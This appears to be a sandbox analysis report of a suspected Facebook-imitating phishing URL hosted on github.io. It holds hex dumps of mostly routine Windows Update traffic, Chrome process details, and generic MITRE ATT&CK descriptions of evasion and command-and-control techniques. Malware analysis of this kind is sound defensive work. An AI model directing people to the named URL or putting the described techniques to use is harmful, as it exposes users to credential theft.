2024-09-29 04:06:47 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	54351	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:07:06 UTC	124	OUT	GET /sls/ping HTTP/1.1 Connection: Keep-Alive User-Agent: DNS resiliency checker/1.0 Host: slscr.update.microsoft.com
2024-09-29 04:07:06 UTC	318	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: -1 MS-CV: 8qBDMpoRF0ej0srk.0 MS-RequestId: bfc1c20a-a4fe-4652-a7eb-de3fbbb50bf2 MS-CorrelationId: 7bfc9d9c-b73c-4f9a-95c2-d8e8fc91a002 X-Content-Type-Options: nosniff Date: Sun, 29 Sep 2024 04:07:06 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	54352	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:07:08 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ggFwwBvAHA5o5lp&MD=GG7MMAKl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-29 04:07:08 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 9380fcdc-42a6-4bc1-9169-34b2d3ef6ab8 MS-RequestId: 4b54032f-3108-4bfb-9041-0d76ebe6fd8d MS-CV: 8+Kst6oiUkqTshkC.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 29 Sep 2024 04:07:07 GMT Connection: close Content-Length: 24490
2024-09-29 04:07:08 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-09-29 04:07:08 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	54353	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:07:09 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ggFwwBvAHA5o5lp&MD=GG7MMAKl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-29 04:07:10 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: c75ca65a-b590-4e42-8497-e3801e97c903 MS-RequestId: 88e5c03e-8f30-4433-90d0-d455c8945c6c MS-CV: TaOHcmzwwUmvXn62.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 29 Sep 2024 04:07:09 GMT Connection: close Content-Length: 30005
2024-09-29 04:07:10 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-09-29 04:07:10 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	00:06:27
Start date:	29/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	00:06:33
Start date:	29/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	00:06:34
Start date:	29/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://omar-tnzxoo.github.io/facebook-mobile/index.html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:06:37
Start date:	29/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5424 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	00:06:38
Start date:	29/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://omar-tnzxoo.github.io/facebook-mobile/index.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\LICENSE

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\sets.json

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
https://omar-tnzxoo.github.io/facebook-mobile/index.html